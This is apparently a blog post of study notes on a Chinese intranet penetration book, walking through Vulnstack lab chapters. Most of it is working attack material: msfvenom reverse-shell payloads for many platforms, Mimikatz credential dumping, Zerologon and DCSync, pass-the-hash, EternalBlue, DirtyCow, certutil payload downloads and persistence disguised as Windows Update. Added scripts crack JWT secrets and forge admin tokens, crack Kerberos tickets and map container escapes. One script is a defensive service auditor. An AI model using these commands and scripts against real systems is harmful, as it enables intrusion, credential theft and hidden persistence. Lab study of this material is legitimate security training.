[Book] Intranet Penetration Practice Strategy


The book

Introduction

This article keeps my notes and summaries of the book “Intranet Penetration Practice Strategy”.
It will be updated continuously as I read through the book.

Reflection

This book first introduces the fundamental knowledge and tools of intranet penetration testing.
It then demonstrates practical approaches to penetration testing in the experimental environment it provides (the Vulnstack labs).
The following topics are covered:

  • Cobalt Strike
  • Web penetration
  • Spreading payloads (malware) through the intranet
  • Anti-virus evasion
  • Post-exploitation persistence
  • PTH (Pass-the-Hash)

While the book covers a wide range of post-exploitation techniques, it does not delve into the underlying principles behind these tools.
As a result, readers without a solid foundational background may struggle to fully understand certain features, such as Meterpreter's autoroute mechanism and the SOCKS5 proxy it is combined with.

Chapter.1 - Fundamentals of Intranet Penetration

  • WORKGROUP
  • Domain
  • AD (Active Directory)

A host that is not joined to a domain reports its workgroup name in the Domain field of systeminfo:

> systeminfo
...
Domain: WORKGROUP
...

A domain-joined host reports the domain it belongs to instead:

> systeminfo
...
Domain: SomeDomain.org
...

Chapter.3 - Environment Setup and Useful Tools

3.2 - Port Discovery

> nmap -sC -sV -v -A <TargetIP>
  • -sC: Performs a script scan using the default set of safe scripts from the Nmap Scripting Engine (NSE).
  • -sV: Enables version detection.
  • -v: Verbose; shows more information while the scan runs.
  • -A: Enables OS detection, version detection, script scanning, and traceroute; it already implies -sC and -sV, so those two are redundant here.

3.4 - Buster Tools

DirBuster

SNETCracker

dirsearch

https://github.com/maurosoria/dirsearch

> python dirsearch.py -u <Target URL> -e all

JWTPyCrack

https://github.com/Ch1ngg/JWTPyCrack

> python jwtcrack.py -m blasting -s jwt --kf <KeyFile>
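As an added example (not code from the book or from JWTPyCrack), the Python below does what a `--kf` wordlist attack against an HS256 token amounts to: recompute HMAC-SHA256 over `header.payload` with each candidate secret and compare it to the token's signature, then re-sign the token with altered claims once the secret is known. The sample token and the in-memory wordlist are constructed for the example; `load_keyfile` assumes a plain one-secret-per-line file like the book's <KeyFile>.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, List, Optional


def b64url_encode(data: bytes) -> str:
    """Base64url without '=' padding, as JWS requires (RFC 7515)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, claims: dict, secret: bytes) -> str:
    """Build a compact JWS (header.payload.signature) signed with HMAC-SHA256."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode()) for part in (header, claims)
    )
    tag = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(tag)


def decode_claims(token: str) -> dict:
    """Payload only; no signature check (useful to see what a forged token claims)."""
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate secret whose HMAC over header.payload equals the
    token's signature, else None. Only HS256 is attempted: an RS256 token has no
    shared secret to recover, so the wordlist is pointless against it."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a compact JWS with three dot-separated parts")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"alg={header.get('alg')!r}: this cracker only handles HS256")
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = b64url_decode(sig_b64)
    for secret in candidates:
        tag = hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(tag, expected):   # constant-time compare, as a verifier should do
            return secret
    return None


def forge_with_secret(token: str, secret: str, **new_claims) -> str:
    """Why a guessable secret is critical: re-sign the token with modified claims."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(payload_b64))
    claims.update(new_claims)
    return sign_hs256(header, claims, secret.encode("utf-8"))


def load_keyfile(path: str) -> List[str]:
    """Candidate secrets one per line (assumption: the same shape as JWTPyCrack's --kf file)."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        return [line.rstrip("\r\n") for line in fh if line.strip()]


# Constructed sample: a token signed with the weak secret "secret" and a tiny wordlist
# standing in for <KeyFile>.
WORDLIST = ["123456", "password", "admin123", "secret", "changeme"]
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, b"secret")

if __name__ == "__main__":
    found = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", found)
    if found:
        print("forged token:", forge_with_secret(SAMPLE_TOKEN, found, role="admin"))
```

Replace `WORDLIST` with `load_keyfile("<KeyFile>")` to run it against a real wordlist; a token whose header says `alg: none` or an RSA algorithm is rejected up front instead of wasting the run.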

tgsrepcrack

> python tgsrepcrack.py <Dictionary File> <Ticket File>
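tgsrepcrack tests every dictionary word against the RC4-HMAC (etype 23) encrypted part of a requested service ticket. The added Python below (neither the book's nor Kerberoast's code) shows that per-guess check end to end: derive the NT hash (MD4 over UTF-16LE) from the candidate password, derive the RFC 4757 keys for key usage 2, decrypt with RC4 and compare the HMAC-MD5 checksum. It reads the hashcat-style `$krb5tgs$23$` line rather than the .kirbi file the book passes as <Ticket File>, which is an assumption; the ticket contents, service name and wordlist are constructed for the example.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, in pure Python: OpenSSL 3 moved md4 to its legacy provider,
    so hashlib.new('md4') is frequently unavailable on modern systems."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[j] + k) & MASK32, shifts[i % 4]), b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                                   # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                                      # keystream XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_TICKET = 2   # RFC 4120: the ticket's enc-part is encrypted under the service key with usage 2


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes, usage: int = KEY_USAGE_TICKET) -> bytes:
    """RFC 4757 section 6: checksum || RC4(K3, confounder || plaintext). Used here only to build the sample."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum = hmac_md5(k1, confounder + plaintext)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_check(key: bytes, blob: bytes, usage: int = KEY_USAGE_TICKET) -> bool:
    """Decrypt with the candidate key and recompute the checksum: the whole test a cracker does per guess."""
    checksum, edata = blob[:16], blob[16:]
    k1 = hmac_md5(key, struct.pack("<I", usage))
    k3 = hmac_md5(k1, checksum)
    return hmac.compare_digest(hmac_md5(k1, rc4(k3, edata)), checksum)


def parse_krb5tgs23(line: str) -> bytes:
    """'$krb5tgs$23$*user$REALM$spn*$<checksum hex>$<edata hex>' -> checksum || edata."""
    parts = line.strip().split("$")
    if len(parts) < 6 or parts[1] != "krb5tgs" or parts[2] != "23":
        raise ValueError("expected a $krb5tgs$23$ (etype 23, RC4-HMAC) hash line")
    return bytes.fromhex(parts[-2]) + bytes.fromhex(parts[-1])


def crack_tgs(line: str, wordlist: Iterable[str]) -> Optional[str]:
    blob = parse_krb5tgs23(line)
    for password in wordlist:
        if rc4_hmac_check(nt_hash(password), blob):
            return password
    return None


# Constructed sample: a made-up EncTicketPart for a service account whose password is "Summer2019!".
_EDATA = rc4_hmac_encrypt(nt_hash("Summer2019!"), b"<constructed EncTicketPart bytes>", confounder=bytes(range(8)))
SAMPLE_HASH = ("$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/db01.corp.local:1433*$"
               + _EDATA[:16].hex() + "$" + _EDATA[16:].hex())
WORDLIST = ["123456", "Welcome1", "Password1", "Summer2019!", "Winter2019!"]

if __name__ == "__main__":
    print("cracked:", crack_tgs(SAMPLE_HASH, WORDLIST))
```

The check is cheap (one MD4, three HMAC-MD5s and one RC4 pass per guess), which is exactly why RC4 service tickets are the ones attackers ask for; tickets issued with AES (etype 17/18) need a PBKDF2 derivation per guess and crack orders of magnitude slower.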

3.10 - Post-Exploitation

Msfvenom

Windows Payload

> msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=192.168.0.1 LPORT=4444 -f exe -o /tmp/shell.exe

Encoded Windows Payload

> msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -i 3 -e x86/shikata_ga_nai LHOST=192.168.0.1 LPORT=4444 -f exe -o /tmp/shell.exe

Linux Payload

> msfvenom -p linux/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > /tmp/shell.elf

macOS Payload

> msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f macho > /tmp/shell.macho

PHP Payload

> msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f raw

ASP Payload

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f asp

ASPX Payload

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f aspx

JSP Payload

> msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f raw

WAR Payload

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f war

Bash Payload

> msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.1 LPORT=4444 -f bash

Perl Payload

> msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.1 LPORT=4444 -f raw

Python Payload

> msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f raw

The listener port is set with LPORT (not port); LHOST and LPORT must match the options given to exploit/multi/handler on the attacker's side.

Mimikatz

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > password.txt

privilege::debug
token::elevate

mimikatz # ts::sessions
mimikatz # ts::remote /id:1

# Test whether the DC is vulnerable to Zerologon (CVE-2020-1472)
lsadump::zerologon /target:DC.domain.com /account:DC$

# Exploit Zerologon: resets the DC machine account (DC$) password to an empty one
lsadump::zerologon /target:DC.domain.com /account:DC$ /exploit

# Use the now-empty DC$ password to DCSync the administrator's credentials
lsadump::dcsync /domain:domain.com /dc:DC.domain.com /user:administrator /authuser:DC$ /authdomain:domain /authpassword:"" /authntlm

# Restore the DC machine account password afterwards: leaving it empty breaks the DC's own authentication and replication
lsadump::postzerologon /target:domain.com /account:DC$

Chapter.4 - Vulnstack1: Spreading Through Domain Accounts

Persistence

Cobalt Strike

beacon> shell sc create "WindowsUpdate" binpath= "cmd /c start C:\Users\Administrator\Desktop\Artifact.exe" && sc config "WindowsUpdate" start= auto && net start WindowsUpdate

sc requires a space after binpath= and start= or it rejects the arguments; the service name and description deliberately imitate Windows Update so the entry is overlooked in the service list.

Chapter.5 - Vulnstack2: Confronting Anti-Virus

Chapter.6 - Vulnstack3: Obtaining DC Privileges Through PTH

Discovery

run autoroute -s 192.168.93.0/24
background
use auxiliary/server/socks_proxy
set SRVPORT 6677
run

Spreading

use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.93.30
set SMBUser administrator
set PASS_FILE /root/passwd.txt
run

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set RHOSTS 192.168.93.30
set SMBUser administrator
set SMBPass 123qwe!ASD
# SMBPass also accepts an LM:NT hash pair, which is how psexec is used for pass-the-hash
run

systeminfo

Chapter.7 - Vulnstack4: Docker Escape/Container Breakout

Attack and Exploitation Stage

After getshell:

> find / -name .dockerenv

CDK

https://github.com/cdk-team/CDK

chmod +x cdk
./cdk evaluate --full

SYS_ADMIN

./cdk run mount-disk
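`cdk evaluate` reports, among other things, the container's effective capabilities, and `mount-disk` only works when CAP_SYS_ADMIN is among them. The added Python below (not CDK's code) decodes the CapEff bitmask from /proc/self/status into capability names and flags the ones that are known stepping stones to the host. The bit numbers are those of include/uapi/linux/capability.h; the status excerpt is constructed, and the script falls back to it when /proc is not available.

```python
import os
import re
from typing import Dict, List, Optional

# Capability bit numbers from include/uapi/linux/capability.h (CAP_CHOWN = 0 ... CAP_CHECKPOINT_RESTORE = 40).
CAP_NAMES = (
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill", "setgid", "setuid",
    "setpcap", "linux_immutable", "net_bind_service", "net_broadcast", "net_admin", "net_raw",
    "ipc_lock", "ipc_owner", "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time", "sys_tty_config", "mknod",
    "lease", "audit_write", "audit_control", "setfcap", "mac_override", "mac_admin", "syslog",
    "wake_alarm", "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
)

# Capabilities that, inside a container, are well-known routes to the host.
ESCAPE_HINTS: Dict[str, str] = {
    "sys_admin": "mount the host's block device (what `cdk run mount-disk` does) or abuse cgroup release_agent",
    "dac_read_search": "open_by_handle_at() to read arbitrary host files (the Shocker technique)",
    "sys_module": "load a kernel module into the kernel shared with the host",
    "sys_ptrace": "ptrace into host processes when the PID namespace is shared",
    "sys_rawio": "raw access to block devices and memory",
}


def decode_capeff(hex_mask: str) -> List[str]:
    """Turn the CapEff hex bitmask into capability names (bit n set -> CAP_NAMES[n])."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


def capeff_from_status(status_text: str) -> Optional[str]:
    """Extract the CapEff value from /proc/<pid>/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    return m.group(1) if m else None


def escape_candidates(caps: List[str]) -> Dict[str, str]:
    return {c: ESCAPE_HINTS[c] for c in caps if c in ESCAPE_HINTS}


def container_indicators(root: str = "/") -> List[str]:
    """Filesystem hints that we are inside a container (the `find / -name .dockerenv` check and friends)."""
    hits = []
    if os.path.exists(os.path.join(root, ".dockerenv")):
        hits.append("/.dockerenv present")
    cgroup = os.path.join(root, "proc", "1", "cgroup")
    if os.path.exists(cgroup):
        with open(cgroup) as fh:
            text = fh.read()
        if any(tag in text for tag in ("docker", "kubepods", "containerd")):
            hits.append("container cgroup in /proc/1/cgroup")
    return hits


# Constructed /proc/self/status excerpt: Docker's default capability set plus --cap-add SYS_ADMIN (bit 21).
SAMPLE_STATUS = (
    "Name:\tbash\nPid:\t1\n"
    "CapInh:\t0000000000000000\nCapPrm:\t00000000a82425fb\n"
    "CapEff:\t00000000a82425fb\nCapBnd:\t00000000a82425fb\n"
)

if __name__ == "__main__":
    try:
        with open("/proc/self/status") as fh:
            status = fh.read()
    except OSError:
        status = SAMPLE_STATUS
    caps = decode_capeff(capeff_from_status(status) or "0")
    print("indicators:", container_indicators())
    print("effective caps:", caps)
    print("escape candidates:", escape_candidates(caps))
```

Docker's unmodified default set decodes to 14 capabilities without sys_admin; a `--privileged` container shows every bit set (000001ffffffffff on current kernels), which is the case CDK's mount-disk exploits.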

ssh-keygen -t rsa
ls /root/.ssh/
cat /root/.ssh/id_rsa.pub

DirtyCow

https://github.com/firefart/dirtycow

unzip dirtycow-master.zip
cd dirtycow-master
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
# overwrites the root entry in /etc/passwd with a uid 0 user "firefart" whose password is the argument
./dirty 123456

Check if the account firefart exists.

cat /etc/passwd


Configure an intranet proxy with Metasploit

# on the attacker: note the attacker's IP and build the implant for the compromised container
ifconfig
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.150.188 LPORT=12345 -f elf > 12345.elf

# on the attacker: start the handler before the implant runs
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.150.188
set LPORT 12345
run

# on the compromised host
chmod +x 12345.elf
./12345.elf

# back in the Meterpreter session: add routes for the internal subnets, then expose them over SOCKS
meterpreter> route
meterpreter> run autoroute -s 192.168.96.0/24
meterpreter> run autoroute -s 192.168.183.0/24
meterpreter> background
msf> use auxiliary/server/socks_proxy
msf> show options
msf> exploit
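The autoroute plus socks_proxy pair, used here and in Chapter 6, is the mechanism the book leaves unexplained. The added Python below, which is not Metasploit code, walks through the SOCKS5 handshake (RFC 1928) between a client such as proxychains and the proxy, and models the proxy's decision the way msf makes it: a CONNECT to a destination can only succeed if some session has a route for that subnet, which is what `run autoroute -s <subnet>` registers. Both sides run in memory, so nothing is sent on the network; the route list and target addresses are assumed from the chapter's lab.

```python
import ipaddress
import socket
import struct
from typing import List, Tuple

SOCKS5, NO_AUTH, NO_ACCEPTABLE = 0x05, 0x00, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REP_SUCCEEDED, REP_GENERAL_FAILURE, REP_HOST_UNREACHABLE, REP_CMD_UNSUPPORTED = 0x00, 0x01, 0x04, 0x07


def build_greeting(methods=(NO_AUTH,)) -> bytes:
    """Client -> proxy: VER | NMETHODS | METHODS (RFC 1928 section 3)."""
    return bytes([SOCKS5, len(methods), *methods])


def select_method(greeting: bytes) -> bytes:
    """Proxy -> client: VER | METHOD. msf's socks_proxy accepts unauthenticated clients by default."""
    if len(greeting) < 2 or greeting[0] != SOCKS5 or len(greeting) != 2 + greeting[1]:
        raise ValueError("malformed greeting")
    chosen = NO_AUTH if NO_AUTH in greeting[2:] else NO_ACCEPTABLE
    return bytes([SOCKS5, chosen])


def build_connect(host: str, port: int) -> bytes:
    """Client -> proxy: VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT (section 4)."""
    try:
        dst = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:                                        # not a dotted quad: send as a domain name
        name = host.encode("idna")
        dst = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS5, CMD_CONNECT, 0x00]) + dst + struct.pack("!H", port)


def parse_connect(request: bytes) -> Tuple[int, str, int]:
    if len(request) < 4 or request[0] != SOCKS5:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp = request[1], request[3]
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(request[4:8]), request[8:]
    elif atyp == ATYP_DOMAIN:
        n = request[4]
        host, rest = request[5:5 + n].decode("idna"), request[5 + n:]
    else:
        raise ValueError("unsupported ATYP")
    return cmd, host, struct.unpack("!H", rest[:2])[0]


def build_reply(rep: int) -> bytes:
    """Proxy -> client: VER | REP | RSV | ATYP | BND.ADDR | BND.PORT (bind address left zeroed)."""
    return bytes([SOCKS5, rep, 0x00, ATYP_IPV4]) + bytes(4) + struct.pack("!H", 0)


def parse_reply(reply: bytes) -> int:
    if len(reply) < 2 or reply[0] != SOCKS5:
        raise ValueError("not a SOCKS5 reply")
    return reply[1]


def pivot_handle_connect(request: bytes, routes: List[str]) -> bytes:
    """Proxy side. Like msf, the proxy can only reach destinations covered by a registered
    route (run autoroute -s <subnet>): no matching route, no CONNECT."""
    try:
        cmd, host, _port = parse_connect(request)
    except ValueError:
        return build_reply(REP_GENERAL_FAILURE)
    if cmd != CMD_CONNECT:
        return build_reply(REP_CMD_UNSUPPORTED)
    try:
        dst = ipaddress.ip_address(host)
    except ValueError:                                     # a bare hostname cannot be matched against routes here
        return build_reply(REP_HOST_UNREACHABLE)
    if any(dst in ipaddress.ip_network(r) for r in routes):
        return build_reply(REP_SUCCEEDED)
    return build_reply(REP_HOST_UNREACHABLE)


def socks5_exchange(host: str, port: int, routes: List[str]) -> Tuple[List[bytes], int]:
    """Run both sides of the handshake in memory; returns the wire messages and the final REP code."""
    greeting = build_greeting()
    method = select_method(greeting)
    if method[1] != NO_AUTH:
        raise RuntimeError("proxy rejected our authentication methods")
    request = build_connect(host, port)
    reply = pivot_handle_connect(request, routes)
    return [greeting, method, request, reply], parse_reply(reply)


# Assumed lab layout: the session's host sits in 192.168.93.0/24, the subnet added with
# `run autoroute -s 192.168.93.0/24` in Chapter 6.
ROUTES = ["192.168.93.0/24"]

if __name__ == "__main__":
    for target in ("192.168.93.30", "10.10.10.10"):
        msgs, rep = socks5_exchange(target, 445, ROUTES)
        print(target, "REP=0x%02x" % rep, [m.hex() for m in msgs])
```

With the real proxy, proxychains (configured with `socks5 127.0.0.1 6677`, the SRVPORT chosen in Chapter 6) performs exactly this exchange on behalf of each tool you run through it; a REP of 0x04 from msf usually means the subnet was never added with autoroute, not that the host is down.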
use exploit/windows/smb/ms17_010_eternalblue
# bind_tcp: the pivoted target cannot call back to the attacker, so Metasploit connects to it through the route
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.183.130
run

run post/windows/gather/smart_hashdump

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.183.129

set SMBUser TESTWIN7-PC
set SMBPass
run

Persistence and Recovery Stage

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.210.111 LPORT=17918 -f elf > 17918.elf

chmod +x 17918.elf

# add a cron entry for root that re-launches the implant
vim /var/spool/cron/crontabs/root

Chapter.8 - Vulnstack5: Using PsExec to Exploit a DC With NO Internet Access

Discovery and Spreading

certutil.exe -urlcache -split -f http://x.x.x.x/payload.exe

beacon> shell netsh firewall show state
beacon> shell netsh advfirewall set allprofiles state off

Persistence and Recovery

beacon> shell sc config "windows update" start= auto
beacon> shell sc description "windows update" "Windows patch"
beacon> shell net start "windows update"
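Both this chapter and Chapter 4 persist through a service whose binary path is `cmd /c start <dropped exe>` and whose name imitates Windows Update. The added Python below (not from the book) is the defender's counterpart: it parses `sc qc` output and flags services with launcher wrappers, binaries in user-writable paths, or update-lookalike names that are not Windows' own update services. The `sc qc` text is constructed to mirror the chapter's service next to the real wuauserv.

```python
import re
from typing import Dict, List

# Windows' own update services; an "update" lookalike name on anything else is suspicious.
KNOWN_UPDATE_SERVICES = {"wuauserv", "usosvc", "waasmedicsvc"}
LAUNCHER_RE = re.compile(
    r'^"?(?:[a-z]:\\[^"]*\\)?(cmd|cmd\.exe|powershell|powershell\.exe|wscript\.exe|cscript\.exe|mshta\.exe)\b',
    re.I,
)
USER_WRITABLE_RE = re.compile(r"\\(users|temp|programdata|appdata)\\", re.I)
SYSTEM_PATH_RE = re.compile(r'^"?[a-z]:\\(windows|program files( \(x86\))?)\\', re.I)


def parse_sc_qc(text: str) -> List[Dict[str, str]]:
    """Parse the output of one or more `sc qc <name>` calls into one dict per service."""
    services, current = [], None
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if not m:
            continue                                   # "[SC] QueryServiceConfig SUCCESS" and blank lines
        key, value = m.groups()
        if key == "SERVICE_NAME":
            current = {"SERVICE_NAME": value}
            services.append(current)
        elif current is not None:
            current[key] = value
    return services


def audit_service(svc: Dict[str, str]) -> List[str]:
    findings = []
    path = svc.get("BINARY_PATH_NAME", "")
    name = svc.get("SERVICE_NAME", "").lower()
    display = svc.get("DISPLAY_NAME", "").lower()
    if LAUNCHER_RE.match(path):
        findings.append("binary path is an interpreter/launcher wrapper (cmd /c start ...)")
    if USER_WRITABLE_RE.search(path):
        findings.append("binary lives under a user-writable directory")
    elif path and not SYSTEM_PATH_RE.match(path):
        findings.append("binary is outside Windows/Program Files")
    if ("update" in name or "update" in display) and name not in KNOWN_UPDATE_SERVICES:
        findings.append("name imitates Windows Update but is not a known update service")
    if findings and "AUTO_START" in svc.get("START_TYPE", ""):
        findings.append("AUTO_START: survives reboot")
    return findings


def audit_all(text: str) -> Dict[str, List[str]]:
    report = {}
    for svc in parse_sc_qc(text):
        findings = audit_service(svc)
        if findings:
            report[svc["SERVICE_NAME"]] = findings
    return report


# Constructed `sc qc` output: the chapter's fake "WindowsUpdate" service beside the genuine wuauserv.
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WindowsUpdate
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : cmd /c start C:\\Users\\Administrator\\Desktop\\Artifact.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WindowsUpdate
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: wuauserv
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Windows Update
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    for service, findings in audit_all(SAMPLE_SC_QC).items():
        print(service)
        for f in findings:
            print("  -", f)
```

To run it against a live host, feed it the concatenated output of `sc qc` for every name listed by `sc query state= all`; on Windows the same fields are available from the ImagePath and Start values under HKLM\SYSTEM\CurrentControlSet\Services.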

Chapter.9 - Exploiting Zerologon to Obtain DC Privileges


Chapter.10 - Penetrating a Multi-Level Intranet by Exploiting Different Services


Chapter.11 - Obtaining DC Privileges Through SPNs